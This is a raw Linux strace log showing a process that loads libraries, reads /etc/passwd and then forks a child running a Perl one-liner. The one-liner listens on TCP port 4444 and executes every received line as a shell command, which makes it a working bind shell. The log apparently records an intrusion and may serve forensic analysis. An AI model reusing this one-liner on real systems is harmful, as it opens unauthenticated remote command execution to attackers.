\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

10736 07:34:23.538046 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

10736 07:34:23.538063 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7daf000

10736 07:34:23.538075 mmap2(0xb7db6000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7db6000

10736 07:34:23.538092 close(1)          = 0

10736 07:34:23.538104 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10736 07:34:23.538117 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

10736 07:34:23.538130 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

10736 07:34:23.538215 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

10736 07:34:23.538232 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d97000

10736 07:34:23.538243 mmap2(0xb7dab000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7dab000

10736 07:34:23.538258 mmap2(0xb7dad000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7dad000

10736 07:34:23.538275 close(1)          = 0

10736 07:34:23.538406 munmap(0xb7f3d000, 29913) = 0

10736 07:34:23.538446 open("/etc/ld.so.cache", O_RDONLY) = 1

10736 07:34:23.538459 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10736 07:34:23.538475 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f3d000

10736 07:34:23.538485 close(1)          = 0

10736 07:34:23.538495 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10736 07:34:23.538510 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

10736 07:34:23.538524 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10736 07:34:23.538610 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

10736 07:34:23.538627 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d8d000

10736 07:34:23.538639 mmap2(0xb7d95000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d95000

10736 07:34:23.538655 close(1)          = 0

10736 07:34:23.538667 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10736 07:34:23.538680 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

10736 07:34:23.538694 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10736 07:34:23.538781 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

10736 07:34:23.538798 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d82000

10736 07:34:23.538809 mmap2(0xb7d8b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d8b000

10736 07:34:23.538825 close(1)          = 0

10736 07:34:23.538845 munmap(0xb7f3d000, 29913) = 0

10736 07:34:23.538888 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

10736 07:34:23.538904 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

10736 07:34:23.538932 _llseek(1, 0, [0], SEEK_CUR) = 0

10736 07:34:23.538947 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

10736 07:34:23.538964 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f44000

10736 07:34:23.538975 _llseek(1, 1624, [1624], SEEK_SET) = 0

10736 07:34:23.538989 munmap(0xb7f44000, 1624) = 0

10736 07:34:23.538999 close(1)          = 0

10736 07:34:23.539028 getpgrp()         = 3831

10736 07:34:23.539039 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

10736 07:34:23.539054 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

10736 07:34:23.539069 brk(0x8101000)    = 0x8101000

10736 07:34:23.539100 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10736 07:34:23.539115 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10736 07:34:23.539129 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10736 07:34:23.539166 brk(0x8102000)    = 0x8102000

10736 07:34:23.539192 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10736 07:34:23.539210 stat64("/sbin/AB", 0xbfb679b8) = -1 ENOENT (No such file or directory)

10736 07:34:23.539222 stat64("/bin/AB", 0xbfb679b8) = -1 ENOENT (No such file or directory)

10736 07:34:23.539233 stat64("/usr/sbin/AB", 0xbfb679b8) = -1 ENOENT (No such file or directory)

10736 07:34:23.539245 stat64("/usr/bin/AB", 0xbfb679b8) = -1 ENOENT (No such file or directory)

10736 07:34:23.539259 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10736 07:34:23.539273 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7db86f8) = 10737

10737 07:34:23.539317 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10737 07:34:23.539333 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10737 07:34:23.539346 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10737 07:34:23.539357 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10737 07:34:23.539439 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10737 07:34:23.539469 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10737 07:34:23.539483 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10737 07:34:23.539550 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

10737 07:34:23.539564 --- SIGPIPE (Broken pipe) @ 0 (0) ---

10737 07:34:23.539628 exit_group(127)   = ?

10736 07:34:23.555600 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10736 07:34:23.555661 --- SIGCHLD (Child exited) @ 0 (0) ---

10736 07:34:23.555687 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10737

10736 07:34:23.555720 waitpid(-1, 0xbfb67638, WNOHANG) = -1 ECHILD (No child processes)

10736 07:34:23.555742 sigreturn()       = ? (mask now [])

10736 07:34:23.555772 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10736 07:34:23.555788 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10736 07:34:23.555799 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10736 07:34:23.555811 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

10736 07:34:23.555829 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10736 07:34:23.555841 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

10736 07:34:23.555875 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10736 07:34:23.555895 stat64("/sbin/perl", 0xbfb679e8) = -1 ENOENT (No such file or directory)

10736 07:34:23.555907 stat64("/bin/perl", 0xbfb679e8) = -1 ENOENT (No such file or directory)

10736 07:34:23.555919 stat64("/usr/sbin/perl", 0xbfb679e8) = -1 ENOENT (No such file or directory)

10736 07:34:23.555931 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10736 07:34:23.555949 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10736 07:34:23.555975 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10736 07:34:23.555990 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7db86f8) = 10738

4519  07:34:23.556028 waitpid(10736,  <unfinished ...>

10738 07:34:23.565107 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10738 07:34:23.565107 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10738 07:34:23.565108 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10738 07:34:23.565108 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10738 07:34:23.565108 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10738 07:34:23.565108 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10738 07:34:23.565108 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10738 07:34:23.565109 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

10738 07:34:23.565164 brk(0)            = 0x8153000

10738 07:34:23.565185 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10738 07:34:23.565201 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fcf000

10738 07:34:23.565216 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10738 07:34:23.565233 open("/etc/ld.so.cache", O_RDONLY) = 1

10738 07:34:23.565246 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10738 07:34:23.565264 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fc7000

10738 07:34:23.565274 close(1)          = 0

10738 07:34:23.565286 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10738 07:34:23.565301 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10738 07:34:23.565375 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10738 07:34:23.565483 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10738 07:34:23.565501 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fc3000

10738 07:34:23.565513 mmap2(0xb7fc5000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7fc5000

10738 07:34:23.565531 close(1)          = 0

10738 07:34:23.565562 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10738 07:34:23.565591 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

10738 07:34:23.565605 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

10738 07:34:23.565754 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

10738 07:34:23.565781 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f9e000

10738 07:34:23.565808 mmap2(0xb7fc1000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7fc1000

10738 07:34:23.565826 close(1)          = 0

10738 07:34:23.565838 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

